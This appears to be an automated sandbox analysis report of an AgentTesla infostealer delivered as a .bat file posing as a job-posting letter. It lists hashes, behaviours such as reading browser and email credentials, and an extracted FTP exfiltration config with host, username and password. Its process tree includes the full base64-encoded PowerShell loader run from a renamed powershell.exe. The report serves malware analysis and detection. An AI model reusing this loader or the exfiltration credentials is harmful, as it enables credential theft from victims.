Analysis
-
max time kernel
100s -
max time network
110s -
platform
windows10-2004_x64 -
resource
win10v2004-20231130-en -
resource tags
arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2023 21:35
Static task
static1
Behavioral task
behavioral1
Sample
Abusive Letter (Resdex Database and Job Posting).bat
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
Abusive Letter (Resdex Database and Job Posting).bat
Resource
win10v2004-20231130-en
General
-
Target
Abusive Letter (Resdex Database and Job Posting).bat
-
Size
1006KB
-
MD5
ee9ec74fbf7fb7ed42103267a77f7d83
-
SHA1
1aeae07889b0c11c8587472db3ebf4b77ff9d451
-
SHA256
559de1ddc69375c9e08b178e72fe6dcbf0e999e7b078ee94c016a152b8907937
-
SHA512
eae98812d446c2963243a4313f94d6c5a1a3fb6ec2d8f8dd742d21f2bd48c1515d6566af8de144741dfb4465f3ea2467a1b3dfcc49e7c4b1d8e0c6749667421e
-
SSDEEP
24576:l/KZIPLG6VRHiTKZdtOyts5TvPISg7iCbdpH3JrgceWk:oIPKwgGDOIGjqbd5qdT
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://files.000webhost.com - Port:
21 - Username:
tain00 - Password:
computer@2020
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Executes dropped EXE 1 IoCs
pid Process 3032 Qmlugnd.png -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Program crash 1 IoCs
pid pid_target Process procid_target 684 3032 WerFault.exe 98 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3032 Qmlugnd.png 3032 Qmlugnd.png 3032 Qmlugnd.png 3032 Qmlugnd.png -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3032 Qmlugnd.png Token: SeDebugPrivilege 3032 Qmlugnd.png Token: SeRestorePrivilege 3032 Qmlugnd.png Token: SeBackupPrivilege 3032 Qmlugnd.png -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3136 wrote to memory of 4424 3136 cmd.exe 90 PID 3136 wrote to memory of 4424 3136 cmd.exe 90 PID 3136 wrote to memory of 4780 3136 cmd.exe 91 PID 3136 wrote to memory of 4780 3136 cmd.exe 91 PID 3136 wrote to memory of 3432 3136 cmd.exe 92 PID 3136 wrote to memory of 3432 3136 cmd.exe 92 PID 3432 wrote to memory of 1376 3432 cmd.exe 95 PID 3432 wrote to memory of 1376 3432 cmd.exe 95 PID 3432 wrote to memory of 4864 3432 cmd.exe 94 PID 3432 wrote to memory of 4864 3432 cmd.exe 94 PID 3432 wrote to memory of 2444 3432 cmd.exe 97 PID 3432 wrote to memory of 2444 3432 cmd.exe 97 PID 3432 wrote to memory of 3176 3432 cmd.exe 96 PID 3432 wrote to memory of 3176 3432 cmd.exe 96 PID 3432 wrote to memory of 3032 3432 cmd.exe 98 PID 3432 wrote to memory of 3032 3432 cmd.exe 98 PID 3432 wrote to memory of 3032 3432 cmd.exe 98
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Abusive Letter (Resdex Database and Job Posting).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:4424
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png2⤵PID:4780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Abusive Letter (Resdex Database and Job Posting).bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png3⤵PID:4864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1376
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\Abusive Letter (Resdex Database and Job Posting).bat" C:\Users\Admin\AppData\Local\Temp\Qmlugnd.png.bat3⤵PID:3176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\Qmlugnd.pngC:\Users\Admin\AppData\Local\Temp\Qmlugnd.png -win 1 -enc JABWAGIAYQBsAGoAdwBrAHAAYgAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABMAGkAbgBlAHMAKAAoACgAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgAuAGIAYQB0ACIAKQAsACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBsAGEAcwB0ACAAMQA7ACAAJABJAG0AdAB1AGwAbwB1AHgAZwBrACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFYAYgBhAGwAagB3AGsAcABiACkAOwAkAFEAbQBpAHcAagBzAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEkAbQB0AHUAbABvAHUAeABnAGsAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASgBjAG0AagBvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFEAbQBpAHcAagBzAGwALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEoAYwBtAGoAbwAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQASgBjAG0AagBvAC4AQwBsAG8AcwBlACgAKQA7ACQAUQBtAGkAdwBqAHMAbAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEkAbQB0AHUAbABvAHUAeABnAGsAIAA9ACAAJABvAHUAdABwAHUAdAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQASQBtAHQAdQBsAG8AdQB4AGcAawApADsAIAAkAEwAZgBuAGkAbQBsAHkAdgBvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAEkAbQB0AHUAbABvAHUAeABnAGsAKQA7ACAAJABPAGoAcgBmAGcAaABjACAAPQAgACQATABmAG4AaQBtAGwAeQB2AG8ALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABHAG4AbABpAGcAIAA9ACAAJABPAGoAcgBmAGcAaABjAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 24044⤵
- Program crash
PID:684
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3032 -ip 30321⤵PID:4804
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
667KB
MD573e6af13c928f8518e5c2755d46ae1da
SHA13b6563ad6554c1544d80b8f323963c81179c61ff
SHA25661bdfec3d05bcf842689122d4098e62c10716f7de7ea9ae5e0ec14a54899f8f7
SHA51246d20936875b0c1280752e5cf1807b851fd761d6c4f312f9b27911e8821ad31a1c3fbeecf15c9280d9791bc2ff25afda4a3e2518a57697604e36afd9e3455607
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82